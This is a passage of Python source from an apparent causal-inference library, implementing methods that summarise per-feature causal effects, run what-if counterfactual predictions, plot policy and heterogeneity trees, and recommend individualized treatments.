f"the training dataset, which is less than the lower limit ({_CAT_LIMIT}), "
"so no heterogeneity model will be fit for it. This check can be turned off by "
"setting 'skip_cat_limit_checks' to True, but that may result in an inaccurate "
"model for this feature.")
invalid_inds.append((ind, 'cat_limit'))
for (ind, _) in invalid_inds:
new_inds.remove(ind)
# also remove from train_inds so we don't try to access the result later
train_inds.remove(ind)
if len(train_inds) == 0:
raise ValueError("No features remain; increase the upper_bound_on_cat_expansion and ensure that there "
"are several instances of each categorical value so that at least "
"one feature model can be trained.")
# extract subset of names matching new columns
new_feat_names = _safe_indexing(feature_names, new_inds)
cache_updates = dict(zip(new_inds,
joblib.Parallel(
n_jobs=self.n_jobs,
verbose=self.verbose
)(joblib.delayed(_process_feature)(
feat_name, feat_ind,
self.verbose, categorical_inds, categories, heterogeneity_inds, min_counts, y, X,
self.nuisance_models, self.heterogeneity_model, self.random_state, self._model_y,
self.cv, self.mc_iters)
for feat_name, feat_ind in zip(new_feat_names, new_inds))))
# track indices where an exception was thrown, since we can't remove from dictionary while iterating
inds_to_remove = []
for ind, value in cache_updates.items():
if isinstance(value, Exception):
# don't want to cache this failed result
inds_to_remove.append(ind)
train_inds.remove(ind)
invalid_inds.append((ind, value))
for ind in inds_to_remove:
del cache_updates[ind]
self._cache.update(cache_updates)
for ind in train_inds:
dict_update, result = self._cache[ind]
self._results.append(result)
for k in dict_update:
self._shared[k] += dict_update[k]
invalid_inds.sort()
self.untrained_feature_indices_ = invalid_inds
self.trained_feature_indices_ = train_inds
self.nuisance_models_ = self.nuisance_models
self.heterogeneity_model_ = self.heterogeneity_model
return self
def _format_col(self, ind):
if self._has_column_names:
return f"Column {ind} ({self.feature_names_[ind]})"
else:
return f"Column {ind}"
# properties to return from effect InferenceResults
@staticmethod
def _point_props(alpha):
return [(_CausalInsightsConstants.PointEstimateKey, 'point_estimate'),
(_CausalInsightsConstants.StandardErrorKey, 'stderr'),
(_CausalInsightsConstants.ZStatKey, 'zstat'),
(_CausalInsightsConstants.PValueKey, 'pvalue'),
(_CausalInsightsConstants.ConfidenceIntervalLowerKey, lambda inf: inf.conf_int(alpha=alpha)[0]),
(_CausalInsightsConstants.ConfidenceIntervalUpperKey, lambda inf: inf.conf_int(alpha=alpha)[1])]
# properties to return from PopulationSummaryResults
@staticmethod
def _summary_props(alpha):
return [(_CausalInsightsConstants.PointEstimateKey, 'mean_point'),
(_CausalInsightsConstants.StandardErrorKey, 'stderr_mean'),
(_CausalInsightsConstants.ZStatKey, 'zstat'),
(_CausalInsightsConstants.PValueKey, 'pvalue'),
(_CausalInsightsConstants.ConfidenceIntervalLowerKey, lambda inf: inf.conf_int_mean(alpha=alpha)[0]),
(_CausalInsightsConstants.ConfidenceIntervalUpperKey, lambda inf: inf.conf_int_mean(alpha=alpha)[1])]
# Converts strings to property lookups or method calls as a convenience so that the
# _point_props and _summary_props above can be applied to an inference object
@staticmethod
def _make_accessor(attr):
if isinstance(attr, str):
s = attr
def attr(o):
val = getattr(o, s)
if callable(val):
return val()
else:
return val
return attr
# Create a summary combining all results into a single output; this is used
# by the various causal_effect and causal_effect_dict methods to generate either a dataframe
# or a dictionary, respectively, based on the summary function passed into this method
def _summarize(self, *, summary, get_inference, props, expand_arr, drop_sample):
assert hasattr(self, "_results"), "This object has not been fit, so cannot get results"
# ensure array has shape (m,y,t)
def ensure_proper_dims(arr):
if expand_arr:
# population summary is missing sample dimension; add it for consistency
arr = np.expand_dims(arr, 0)
if self._vec_y:
# outcome dimension is missing; add it for consistency
arr = np.expand_dims(arr, axis=1)
assert 2 <= arr.ndim <= 3
# add singleton treatment dimension if missing
return arr if arr.ndim == 3 else np.expand_dims(arr, axis=2)
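        # Orientation note: arrays handled below are coerced to shape (m, y, t), where m indexes samples,
        # y indexes outcomes and t indexes treatment values; missing sample/outcome/treatment axes are added
        # as singleton dimensions so results from different features can be concatenated along the t axis.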
# store set of inference results so we don't need to recompute per-attribute below in summary/coalesce
infs = [get_inference(res) for res in self._results]
# each attr has dimension (m,y) or (m,y,t)
def coalesce(attr):
"""Join together the arrays for each feature"""
attr = self._make_accessor(attr)
# concatenate along treatment dimension
arr = np.concatenate([ensure_proper_dims(attr(inf))
for inf in infs], axis=2)
# for dictionary representation, want to remove unneeded sample dimension
# in cohort and global results
if drop_sample:
arr = np.squeeze(arr, 0)
return arr
return summary([(key, coalesce(val)) for key, val in props])
def _pandas_summary(self, get_inference, *, props, n,
expand_arr=False, keep_all_levels=False):
"""
Summarizes results into a dataframe.
Parameters
----------
get_inference : lambda
Method to get the relevant inference results from each result object
props : list of (string, string or lambda)
Set of column names and ways to get the corresponding values from the inference object
n : int
The number of samples in the dataset
expand_arr : boolean, default False
Whether to add a synthetic sample dimension to the result arrays when performing internal computations
keep_all_levels : boolean, default False
Whether to keep all levels, even when they don't take on more than one value;
Note that regardless of this argument the "sample" level will only be present if expand_arr is False
"""
def make_dataframe(props):
to_include = OrderedDict([(key, value.reshape(-1))
for key, value in props])
# TODO: enrich outcome logic for multi-class classification when that is supported
index = pd.MultiIndex.from_tuples([(i, outcome, res.feature_name, f"{lvl}v{res.feature_baseline}"
if res.feature_baseline is not None
else lvl)
for i in range(n)
for outcome in ["y0"]
for res in self._results
for lvl in res.feature_levels],
names=["sample", "outcome", "feature", "feature_value"])
if expand_arr:
# There is no actual sample level in this data
index = index.droplevel("sample")
if not keep_all_levels:
for lvl in index.levels:
if len(lvl) == 1:
if not isinstance(index, pd.MultiIndex):
# can't drop only level
index = pd.Index([self._results[0].feature_name], name="feature")
else:
index = index.droplevel(lvl.name)
return pd.DataFrame(to_include, index=index)
return self._summarize(summary=make_dataframe,
get_inference=get_inference,
props=props,
expand_arr=expand_arr,
drop_sample=False) # dropping the sample dimension is handled above instead
def _dict_summary(self, get_inference, *, n, props, kind, drop_sample=False, expand_arr=False, row_wise=False):
"""
Summarizes results into a dictionary.
Parameters
----------
get_inference : lambda
Method to get the relevant inference results from each result object
n : int
The number of samples in the dataset
props : list of (string, string or lambda)
Set of column names and ways to get the corresponding values from the inference object
kind : string
The kind of inference results to get (e.g. 'global', 'local', or 'cohort')
drop_sample : boolean, default False
Whether to drop the sample dimension from each array
expand_arr : boolean, default False
Whether to add an initial sample dimension to the result arrays
row_wise : boolean, default False
Whether to return a list of dictionaries (one dictionary per row) instead of
a dictionary of lists (one list per column)
"""
def make_dict(props):
# should be serialization-ready and contain no numpy arrays
res = _get_default_specific_insights(kind)
shared = self._shared
if row_wise:
row_data = {}
# remove entries belonging to row data, since we're including them in the list of nested dictionaries
for k in _get_data_causal_insights_keys():
del res[k]
shared = shared.copy() # copy so that we can modify without affecting shared state
# TODO: Note that there's no column metadata for the sample number - should there be?
for k in _get_column_causal_insights_keys():
# need to replicate the column info for each sample, then remove from the shared data
row_data[k] = shared[k] * n
del shared[k]
                # NOTE: the flattened order has the output dimension before the feature dimension
# which may need to be revisited once we support multiclass
row_data.update([(key, value.flatten()) for key, value in props])
# get the length of the list corresponding to the first dictionary key
# `list(row_data)` gets the keys as a list, since `row_data.keys()` can't be indexed into
n_rows = len(row_data[list(row_data)[0]])
res[_CausalInsightsConstants.RowData] = [{key: row_data[key][i]
for key in row_data} for i in range(n_rows)]
else:
res.update([(key, value.tolist()) for key, value in props])
return {**shared, **res}
return self._summarize(summary=make_dict,
get_inference=get_inference,
props=props,
expand_arr=expand_arr,
drop_sample=drop_sample)
def global_causal_effect(self, *, alpha=0.05, keep_all_levels=False):
"""
Get the global causal effect for each feature as a pandas DataFrame.
Parameters
----------
alpha : float, default 0.05
The confidence level of the confidence interval
keep_all_levels : bool, default False
Whether to keep all levels of the output dataframe ('outcome', 'feature', and 'feature_level')
even if there was only a single value for that level; by default single-valued levels are dropped.
Returns
-------
global_effects : pandas Dataframe
DataFrame with the following structure:
:Columns: ['point', 'stderr', 'zstat', 'pvalue', 'ci_lower', 'ci_upper']
:Index: ['feature', 'feature_value']
:Rows: For each feature that is numerical, we have an entry with index ['{feature_name}', 'num'], where
'num' is literally the string 'num' and feature_name is the input feature name.
For each feature that is categorical, we have an entry with index ['{feature_name}',
'{cat}v{base}'] where cat is the category value and base is the category used as baseline.
If all features are numerical then the feature_value index is dropped in the dataframe, but not
in the serialized dict.
"""
# a global inference indicates the effect of that one feature on the outcome
return self._pandas_summary(lambda res: res.global_inference, props=self._point_props(alpha),
n=1, expand_arr=True, keep_all_levels=keep_all_levels)
def _global_causal_effect_dict(self, *, alpha=0.05, row_wise=False):
"""
Gets the global causal effect for each feature as dictionary.
Dictionary entries for predictions, etc. will be nested lists of shape (d_y, sum(d_t))
Only for serialization purposes to upload to AzureML
"""
return self._dict_summary(lambda res: res.global_inference, props=self._point_props(alpha),
kind='global', n=1, row_wise=row_wise, drop_sample=True, expand_arr=True)
def _cohort_effect_inference(self, Xtest):
assert np.ndim(Xtest) == 2 and np.shape(Xtest)[1] == self._d_x, (
"Shape of Xtest must be compatible with shape of X, "
f"but got shape {np.shape(Xtest)} instead of (n, {self._d_x})"
)
def inference_from_result(result):
est = result.estimator
X = result.X_transformer.transform(Xtest)
if X.shape[1] == 0:
X = None
return est.const_marginal_ate_inference(X=X)
return inference_from_result
def cohort_causal_effect(self, Xtest, *, alpha=0.05, keep_all_levels=False):
"""
Gets the average causal effects for a particular cohort defined by a population of X's.
Parameters
----------
Xtest : array-like
The cohort samples for which to return the average causal effects within cohort
alpha : float, default 0.05
The confidence level of the confidence interval
keep_all_levels : bool, default False
Whether to keep all levels of the output dataframe ('outcome', 'feature', and 'feature_level')
even if there was only a single value for that level; by default single-valued levels are dropped.
Returns
-------
cohort_effects : pandas Dataframe
DataFrame with the following structure:
:Columns: ['point', 'stderr', 'zstat', 'pvalue', 'ci_lower', 'ci_upper']
:Index: ['feature', 'feature_value']
:Rows: For each feature that is numerical, we have an entry with index ['{feature_name}', 'num'], where
'num' is literally the string 'num' and feature_name is the input feature name.
For each feature that is categorical, we have an entry with index ['{feature_name}', '{cat}v{base}']
where cat is the category value and base is the category used as baseline.
If all features are numerical then the feature_value index is dropped in the dataframe, but not
in the serialized dict.
"""
return self._pandas_summary(self._cohort_effect_inference(Xtest),
props=self._summary_props(alpha), n=1,
expand_arr=True, keep_all_levels=keep_all_levels)
def _cohort_causal_effect_dict(self, Xtest, *, alpha=0.05, row_wise=False):
"""
Gets the cohort causal effects for each feature as dictionary.
Dictionary entries for predictions, etc. will be nested lists of shape (d_y, sum(d_t))
Only for serialization purposes to upload to AzureML
"""
return self._dict_summary(self._cohort_effect_inference(Xtest), props=self._summary_props(alpha),
kind='cohort', n=1, row_wise=row_wise, expand_arr=True, drop_sample=True)
def _local_effect_inference(self, Xtest):
assert np.ndim(Xtest) == 2 and np.shape(Xtest)[1] == self._d_x, (
"Shape of Xtest must be compatible with shape of X, "
f"but got shape {np.shape(Xtest)} instead of (n, {self._d_x})"
)
def inference_from_result(result):
est = result.estimator
X = result.X_transformer.transform(Xtest)
if X.shape[1] == 0:
X = None
eff = est.const_marginal_effect_inference(X=X)
if X is None:
# need to reshape the output to match the input
eff = eff._expand_outputs(Xtest.shape[0])
return eff
return inference_from_result
def local_causal_effect(self, Xtest, *, alpha=0.05, keep_all_levels=False):
"""
Gets the local causal effect for each feature as a pandas DataFrame.
Parameters
----------
Xtest : array-like
The samples for which to return the causal effects
alpha : float, default 0.05
The confidence level of the confidence interval
keep_all_levels : bool, default False
Whether to keep all levels of the output dataframe ('sample', 'outcome', 'feature', and 'feature_level')
even if there was only a single value for that level; by default single-valued levels are dropped.
Returns
-------
global_effect : pandas Dataframe
DataFrame with the following structure:
:Columns: ['point', 'stderr', 'zstat', 'pvalue', 'ci_lower', 'ci_upper']
:Index: ['sample', 'feature', 'feature_value']
:Rows: For each feature that is numeric, we have an entry with index
['{sampleid}', '{feature_name}', 'num'],
where 'num' is literally the string 'num' and feature_name is the input feature name and sampleid is
the index of the sample in Xtest.
For each feature that is categorical, we have an entry with index
                   ['{sampleid}', '{feature_name}', '{cat}v{base}']
where cat is the category value and base is the category used as baseline.
If all features are numerical then the feature_value index is dropped in the dataframe, but not
in the serialized dict.
"""
return self._pandas_summary(self._local_effect_inference(Xtest),
props=self._point_props(alpha), n=Xtest.shape[0], keep_all_levels=keep_all_levels)
def _local_causal_effect_dict(self, Xtest, *, alpha=0.05, row_wise=False):
"""
        Gets the local causal effect for each feature as a dictionary
Dictionary entries for predictions, etc. will be nested lists of shape (n_rows, d_y, sum(d_t))
Only for serialization purposes to upload to AzureML
"""
return self._dict_summary(self._local_effect_inference(Xtest), props=self._point_props(alpha),
kind='local', n=Xtest.shape[0], row_wise=row_wise)
def _safe_result_index(self, X, feature_index):
assert hasattr(self, "_results"), "This instance has not yet been fitted"
assert np.ndim(X) == 2 and np.shape(X)[1] == self._d_x, (
"Shape of X must be compatible with shape of the fitted X, "
f"but got shape {np.shape(X)} instead of (n, {self._d_x})"
)
(numeric_index,) = _get_column_indices(X, [feature_index])
bad_inds = dict(self.untrained_feature_indices_)
if numeric_index in bad_inds:
error = bad_inds[numeric_index]
col_text = self._format_col(numeric_index)
if error == 'cat_limit':
msg = f"{col_text} had a value with fewer than {_CAT_LIMIT} occurences, so no model was fit for it"
elif error == 'upper_bound_on_cat_expansion':
msg = (f"{col_text} had more distinct values than the setting of 'upper_bound_on_cat_expansion', "
"so no model was fit for it")
else:
msg = (f"{col_text} generated the following error during fitting, "
f"so no model was fit for it:\n{str(error)}")
raise ValueError(msg)
if numeric_index not in self.trained_feature_indices_:
raise ValueError(f"{self._format_col(numeric_index)} was not passed as a feature index "
"so no model was fit for it")
results = [res for res in self._results
if res.feature_index == numeric_index]
assert len(results) == 1
(result,) = results
return result
def _whatif_inference(self, X, Xnew, feature_index, y):
assert not self.classification, "What-if analysis cannot be applied to classification tasks"
assert np.shape(X)[0] == np.shape(Xnew)[0] == np.shape(y)[0], (
"X, Xnew, and y must have the same length, but have shapes "
f"{np.shape(X)}, {np.shape(Xnew)}, and {np.shape(y)}"
)
assert np.size(feature_index) == 1, f"Only one feature index may be changed, but got {np.size(feature_index)}"
T0 = _safe_indexing(X, feature_index, axis=1)
T1 = Xnew
result = self._safe_result_index(X, feature_index)
X = result.X_transformer.transform(X)
if X.shape[1] == 0:
X = None
inf = result.estimator.effect_inference(X=X, T0=T0, T1=T1)
# we want to offset the inference object by the baseline estimate of y
inf.translate(y)
return inf
def whatif(self, X, Xnew, feature_index, y, *, alpha=0.05):
"""
Get counterfactual predictions when feature_index is changed to Xnew from its observational counterpart.
Note that this only applies to regression use cases; for classification what-if analysis is not supported.
Parameters
----------
X: array-like
Features
Xnew: array-like
New values of a single column of X
feature_index: int or string
The index of the feature being varied to Xnew, either as a numeric index or
the string name if the input is a dataframe
y: array-like
Observed labels or outcome of a predictive model for baseline y values
alpha : float in [0, 1], default 0.05
Confidence level of the confidence intervals displayed in the leaf nodes.
A (1-alpha)*100% confidence interval is displayed.
Returns
-------
y_new: DataFrame
The predicted outputs that would have been observed under the counterfactual features
"""
return self._whatif_inference(X, Xnew, feature_index, y).summary_frame(alpha=alpha)
def _whatif_dict(self, X, Xnew, feature_index, y, *, alpha=0.05, row_wise=False):
"""
Get counterfactual predictions when feature_index is changed to Xnew from its observational counterpart.
Note that this only applies to regression use cases; for classification what-if analysis is not supported.
Parameters
----------
X: array-like
Features
Xnew: array-like
New values of a single column of X
feature_index: int or string
The index of the feature being varied to Xnew, either as a numeric index or
the string name if the input is a dataframe
y: array-like
Observed labels or outcome of a predictive model for baseline y values
alpha : float in [0, 1], default 0.05
Confidence level of the confidence intervals displayed in the leaf nodes.
A (1-alpha)*100% confidence interval is displayed.
row_wise : boolean, default False
Whether to return a list of dictionaries (one dictionary per row) instead of
a dictionary of lists (one list per column)
Returns
-------
dict : dict
The counterfactual predictions, as a dictionary
"""
inf = self._whatif_inference(X, Xnew, feature_index, y)
props = self._point_props(alpha=alpha)
res = _get_default_specific_insights('whatif')
if row_wise:
row_data = {}
# remove entries belonging to row data, since we're including them in the list of nested dictionaries
for k in _get_data_causal_insights_keys():
del res[k]
row_data.update([(key, self._make_accessor(attr)(inf).flatten()) for key, attr in props])
# get the length of the list corresponding to the first dictionary key
# `list(row_data)` gets the keys as a list, since `row_data.keys()` can't be indexed into
n_rows = len(row_data[list(row_data)[0]])
res[_CausalInsightsConstants.RowData] = [{key: row_data[key][i]
for key in row_data} for i in range(n_rows)]
else:
res.update([(key, self._make_accessor(attr)(inf).tolist()) for key, attr in props])
return res
def _tree(self, is_policy, Xtest, feature_index, *, treatment_costs=0,
max_depth=3, min_samples_leaf=2, min_impurity_decrease=1e-4,
include_model_uncertainty=False, alpha=0.05):
result = self._safe_result_index(Xtest, feature_index)
Xtest = result.X_transformer.transform(Xtest)
if Xtest.shape[1] == 0:
Xtest = None
if result.feature_baseline is None:
treatment_names = ['decrease', 'increase']
else:
treatment_names = [f"{result.feature_baseline}"] + \
[f"{lvl}" for lvl in result.feature_levels]
TreeType = SingleTreePolicyInterpreter if is_policy else SingleTreeCateInterpreter
intrp = TreeType(include_model_uncertainty=include_model_uncertainty,
uncertainty_level=alpha,
max_depth=max_depth,
min_samples_leaf=min_samples_leaf,
min_impurity_decrease=min_impurity_decrease,
random_state=self.random_state)
if is_policy:
intrp.interpret(result.estimator, Xtest,
sample_treatment_costs=treatment_costs)
if result.feature_baseline is None: # continuous treatment, so apply a treatment level 10% of typical
treatment_level = result.treatment_value * 0.1
# NOTE: this calculation is correct only if treatment costs are marginal costs,
# because then scaling the difference between treatment value and treatment costs is the
# same as scaling the treatment value and subtracting the scaled treatment cost.
#
                # Note also that unlike the standard outputs of the SingleTreePolicyInterpreter, for
# continuous treatments, the policy value should include the benefit of decreasing treatments
# (rather than just not treating at all)
#
# We can get the total by seeing that if we restrict attention to units where we would treat,
# 2 * policy_value - always_treat
# includes exactly their contribution because policy_value and always_treat both include it
# and likewise restricting attention to the units where we want to decrease treatment,
                # 2 * policy_value - always_treat
# also computes the *benefit* of decreasing treatment, because their contribution to policy_value
# is zero and the contribution to always_treat is negative
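                # Schematic numeric check of the identity above (illustrative only): with per-unit effects
                # [2, -3, 1], treating where beneficial gives policy_value = (2 + 0 + 1) / 3 = 1 and
                # always_treat = (2 - 3 + 1) / 3 = 0, so 2 * policy_value - always_treat = 2, which equals
                # mean(|effect|), i.e. the gain from increasing where positive and decreasing where negative.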
treatment_total = (2 * intrp.policy_value_ - intrp.always_treat_value_.item()) * treatment_level
always_totals = intrp.always_treat_value_ * treatment_level
else:
treatment_total = intrp.policy_value_
always_totals = intrp.always_treat_value_
policy_values = treatment_total, always_totals
else: # no policy values for CATE trees
intrp.interpret(result.estimator, Xtest)
policy_values = None
return intrp, result.X_transformer.get_feature_names(self.feature_names_), treatment_names, policy_values
# TODO: it seems like it would be better to just return the tree itself rather than plot it;
# however, the tree can't store the feature and treatment names we compute here...
def plot_policy_tree(self, Xtest, feature_index, *, treatment_costs=0,
max_depth=3, min_samples_leaf=2, min_value_increase=1e-4, include_model_uncertainty=False,
alpha=0.05):
"""
Plot a recommended policy tree using matplotlib.
Parameters
----------
X : array-like
Features
feature_index
            Index of the feature to be considered as treatment
treatment_costs: array-like, default 0
Cost of treatment, as a scalar value or per-sample. For continuous features this is the marginal cost per
unit of treatment; for discrete features, this is the difference in cost between each of the non-default
values and the default value (i.e., if non-scalar the array should have shape (n,d_t-1))
max_depth : int, default 3
maximum depth of the tree
min_samples_leaf : int, default 2
minimum number of samples on each leaf
min_value_increase : float, default 1e-4
The minimum increase in the policy value that a split needs to create to construct it
include_model_uncertainty : bool, default False
Whether to include confidence interval information when building a simplified model of the cate model.
alpha : float in [0, 1], default 0.05
Confidence level of the confidence intervals displayed in the leaf nodes.
A (1-alpha)*100% confidence interval is displayed.
"""
intrp, feature_names, treatment_names, _ = self._tree(True, Xtest, feature_index,
treatment_costs=treatment_costs,
max_depth=max_depth,
min_samples_leaf=min_samples_leaf,
min_impurity_decrease=min_value_increase,
include_model_uncertainty=include_model_uncertainty,
alpha=alpha)
return intrp.plot(feature_names=feature_names, treatment_names=treatment_names)
def _policy_tree_output(self, Xtest, feature_index, *, treatment_costs=0,
max_depth=3, min_samples_leaf=2, min_value_increase=1e-4, alpha=0.05):
"""
Get a tuple of policy outputs.
The first item in the tuple is the recommended policy tree expressed as a dictionary.
The second item is the per-unit-average value of applying the learned policy; if the feature is continuous this
means the gain from increasing the treatment by 10% of the typical amount for units where the treatment should
be increased and decreasing the treatment by 10% of the typical amount when not.
The third item is the value of always treating. This is a list, with one entry per non-control-treatment for
discrete features, or just a single entry for continuous features, again increasing by 10% of a typical amount.
Parameters
----------
X : array-like
Features
feature_index
            Index of the feature to be considered as treatment
treatment_costs: array-like, default 0
Cost of treatment, as a scalar value or per-sample. For continuous features this is the marginal cost per
unit of treatment; for discrete features, this is the difference in cost between each of the non-default
values and the default value (i.e., if non-scalar the array should have shape (n,d_t-1))
max_depth : int, default 3
maximum depth of the tree
min_samples_leaf : int, default 2
minimum number of samples on each leaf
min_value_increase : float, default 1e-4
The minimum increase in the policy value that a split needs to create to construct it
alpha : float in [0, 1], default 0.05
Confidence level of the confidence intervals displayed in the leaf nodes.
A (1-alpha)*100% confidence interval is displayed.
Returns
-------
output : _PolicyOutput
"""
(intrp, feature_names, treatment_names,
(policy_val, always_trt)) = self._tree(True, Xtest, feature_index,
treatment_costs=treatment_costs,
max_depth=max_depth,
min_samples_leaf=min_samples_leaf,
min_impurity_decrease=min_value_increase,
alpha=alpha)
def policy_data(tree, node_id, node_dict):
return {'treatment': treatment_names[np.argmax(tree.value[node_id])]}
return _PolicyOutput(_tree_interpreter_to_dict(intrp, feature_names, policy_data),
policy_val,
{treatment_names[i + 1]: val
for (i, val) in enumerate(always_trt.tolist())},
treatment_names[0])
# TODO: it seems like it would be better to just return the tree itself rather than plot it;
# however, the tree can't store the feature and treatment names we compute here...
def plot_heterogeneity_tree(self, Xtest, feature_index, *,
max_depth=3, min_samples_leaf=2, min_impurity_decrease=1e-4,
include_model_uncertainty=False,
alpha=0.05):
"""
        Plot an effect heterogeneity tree using matplotlib.
Parameters
----------
X : array-like
Features
feature_index
            Index of the feature to be considered as treatment
max_depth : int, default 3
maximum depth of the tree
min_samples_leaf : int, default 2
minimum number of samples on each leaf
min_impurity_decrease : float, default 1e-4
The minimum decrease in the impurity/uniformity of the causal effect that a split needs to
achieve to construct it
include_model_uncertainty : bool, default False
Whether to include confidence interval information when building a simplified model of the cate model.
alpha : float in [0, 1], default 0.05
Confidence level of the confidence intervals displayed in the leaf nodes.
A (1-alpha)*100% confidence interval is displayed.
"""
intrp, feature_names, treatment_names, _ = self._tree(False, Xtest, feature_index,
max_depth=max_depth,
min_samples_leaf=min_samples_leaf,
min_impurity_decrease=min_impurity_decrease,
include_model_uncertainty=include_model_uncertainty,
alpha=alpha)
return intrp.plot(feature_names=feature_names,
treatment_names=treatment_names)
def _heterogeneity_tree_output(self, Xtest, feature_index, *,
max_depth=3, min_samples_leaf=2, min_impurity_decrease=1e-4,
include_model_uncertainty=False, alpha=0.05):
"""
Get an effect heterogeneity tree expressed as a dictionary.
Parameters
----------
X : array-like
Features
feature_index
            Index of the feature to be considered as treatment
        max_depth : int, default 3
            maximum depth of the tree
        min_samples_leaf : int, default 2
            minimum number of samples on each leaf
        min_impurity_decrease : float, default 1e-4
The minimum decrease in the impurity/uniformity of the causal effect that a split needs to
achieve to construct it
include_model_uncertainty : bool, default False
Whether to include confidence interval information when building a simplified model of the cate model.
alpha : float in [0, 1], default 0.05
Confidence level of the confidence intervals displayed in the leaf nodes.
A (1-alpha)*100% confidence interval is displayed.
"""
intrp, feature_names, _, _ = self._tree(False, Xtest, feature_index,
max_depth=max_depth,
min_samples_leaf=min_samples_leaf,
min_impurity_decrease=min_impurity_decrease,
include_model_uncertainty=include_model_uncertainty,
alpha=alpha)
def hetero_data(tree, node_id, node_dict):
if include_model_uncertainty:
return {'effect': _sanitize(tree.value[node_id]),
'ci': _sanitize(node_dict[node_id]['ci'])}
else:
return {'effect': _sanitize(tree.value[node_id])}
return _tree_interpreter_to_dict(intrp, feature_names, hetero_data)
def individualized_policy(self, Xtest, feature_index, *, n_rows=None, treatment_costs=0, alpha=0.05):
"""
Get individualized treatment policy based on the learned model for a feature, sorted by the predicted effect.
Parameters
----------
Xtest: array-like
Features
feature_index: int or string
Index of the feature to be considered as treatment
n_rows: int, optional
How many rows to return (all rows by default)
treatment_costs: array-like, default 0
Cost of treatment, as a scalar value or per-sample. For continuous features this is the marginal cost per
unit of treatment; for discrete features, this is the difference in cost between each of the non-default
values and the default value (i.e., if non-scalar the array should have shape (n,d_t-1))
alpha: float in [0, 1], default 0.05
Confidence level of the confidence intervals
A (1-alpha)*100% confidence interval is returned
Returns
-------
output: DataFrame
Dataframe containing recommended treatment, effect, confidence interval, sorted by effect
"""
result = self._safe_result_index(Xtest, feature_index)
# get dataframe with all but selected column
orig_df = pd.DataFrame(Xtest, columns=self.feature_names_).rename(
columns={self.feature_names_[result.feature_index]: 'Current treatment'})
Xtest = result.X_transformer.transform(Xtest)
if Xtest.shape[1] == 0:
x_rows = Xtest.shape[0]
Xtest = None
if result.feature_baseline is None:
# apply 10% of a typical treatment for this feature
effect = result.estimator.effect_inference(Xtest, T1=result.treatment_value * 0.1)
else:
effect = result.estimator.const_marginal_effect_inference(Xtest)
if Xtest is None: # we got a scalar effect although our original X may have had more rows
effect = effect._expand_outputs(x_rows)
multi_y = (not self._vec_y) or self.classification
if multi_y and result.feature_baseline is not None and np.ndim(treatment_costs) == 2:
# we've got treatment costs of shape (n, d_t-1) so we need to add a y dimension to broadcast safely
treatment_costs = np.expand_dims(treatment_costs, 1)
effect.translate(-treatment_costs)
est = effect.point_estimate
est_lb = effect.conf_int(alpha)[0]
est_ub = effect.conf_int(alpha)[1]
if multi_y: # y was an array, not a vector
est = np.squeeze(est, 1)
est_lb = np.squeeze(est_lb, 1)
est_ub = np.squeeze(est_ub, 1)
if result.feature_baseline is None:
rec = np.empty(est.shape[0], dtype=object)
rec[est > 0] = "increase"
rec[est <= 0] = "decrease"
# set the effect bounds; for positive treatments these agree with
# the estimates; for negative treatments, we need to invert the interval
eff_lb, eff_ub = est_lb, est_ub
eff_lb[est <= 0], eff_ub[est <= 0] = -eff_ub[est <= 0], -eff_lb[est <= 0]
# the effect is now always positive since we decrease treatment when negative
eff = np.abs(est)
else:
# for discrete treatment, stack a zero result in front for control
zeros = np.zeros((est.shape[0], 1))
all_effs = np.hstack([zeros, est])
eff_ind = np.argmax(all_effs, axis=1)
treatment_arr = np.array([result.feature_baseline] + [lvl for lvl in result.feature_levels], dtype=object)
rec = treatment_arr[eff_ind]
# we need to call effect_inference to get the correct CI between the two treatment options
effect = result.estimator.effect_inference(Xtest, T0=orig_df['Current treatment'], T1=rec)
# we now need to construct the delta in the cost between the two treatments and translate the effect
current_treatment = orig_df['Current treatment'].values
if np.ndim(treatment_costs) >= 2:
                # remove third dimension potentially added
if multi_y: # y was an array, not a vector
treatment_costs = np.squeeze(treatment_costs, 1)
assert treatment_costs.shape[1] == len(treatment_arr) - 1, ("If treatment costs are an array, "
" they must be of shape (n, d_t-1),"
" where n is the number of samples"
" and d_t the number of treatment"
" categories.")
all_costs = np.hstack([zeros, treatment_costs])
                # find the cost of the current treatment: the equality test creates a 2d array with True in each
                # row only at the location of the current treatment; we then take the corresponding cost.
current_cost = all_costs[current_treatment.reshape(-1, 1) == treatment_arr.reshape(1, -1)]
target_cost = np.take_along_axis(all_costs, eff_ind.reshape(-1, 1), 1).reshape(-1)
else:
assert isinstance(treatment_costs, (int, float)), ("Treatments costs should either be float or "
"a 2d array of size (n, d_t-1).")
all_costs = np.array([0] + [treatment_costs] * (len(treatment_arr) - 1))
# construct index of current treatment
current_ind = (current_treatment.reshape(-1, 1) ==
treatment_arr.reshape(1, -1)) @ np.arange(len(treatment_arr))
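                # Worked illustration (comment only): with treatment_arr == array(['a', 'b', 'c']) and
                # current_treatment == array(['b', 'a']), the equality test yields
                # [[False, True, False], [True, False, False]]; multiplying by arange(3) == [0, 1, 2]
                # picks out the matching column for each row, giving current_ind == [1, 0].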
current_cost = all_costs[current_ind]
target_cost = all_costs[eff_ind]
delta_cost = current_cost - target_cost
# add second dimension if needed for broadcasting during translation of effect
if multi_y:
delta_cost = np.expand_dims(delta_cost, 1)
effect.translate(delta_cost)
eff = effect.point_estimate
eff_lb, eff_ub = effect.conf_int(alpha)
if multi_y: # y was an array, not a vector
eff = np.squeeze(eff, 1)
eff_lb = np.squeeze(eff_lb, 1)
eff_ub = np.squeeze(eff_ub, 1)
df = pd.DataFrame({'Treatment': rec,
'Effect of treatment': eff,
'Effect of treatment lower bound': eff_lb,
'Effect of treatment upper bound': eff_ub},
index=orig_df.index)
return df.join(orig_df).sort_values('Effect of treatment',
ascending=False).head(n_rows)
def _individualized_policy_dict(self, Xtest, feature_index, *, n_rows=None, treatment_costs=0, alpha=0.05):
"""
Get individualized treatment policy based on the learned model for a feature, sorted by the predicted effect.
Parameters
----------
Xtest: array-like
Features
feature_index: int or string
Index of the feature to be considered as treatment
n_rows: int, optional
How many rows to return (all rows by default)
treatment_costs: array-like, default 0
Cost of treatment, as a scalar value or per-sample
alpha: float in [0, 1], default 0.05
Confidence level of the confidence intervals
A (1-alpha)*100% confidence interval is returned
Returns
-------
output: dictionary
dictionary containing treatment policy, effects, and other columns
"""
return self.individualized_policy(Xtest, feature_index,
n_rows=n_rows,
treatment_costs=treatment_costs,
alpha=alpha).to_dict('list')
def typical_treatment_value(self, feature_index):
"""
Get the typical treatment value used for the specified feature
Parameters
----------
feature_index: int or string
The index of the feature to be considered as treatment
Returns
-------
treatment_value : float
The treatment value considered 'typical' for this feature
"""
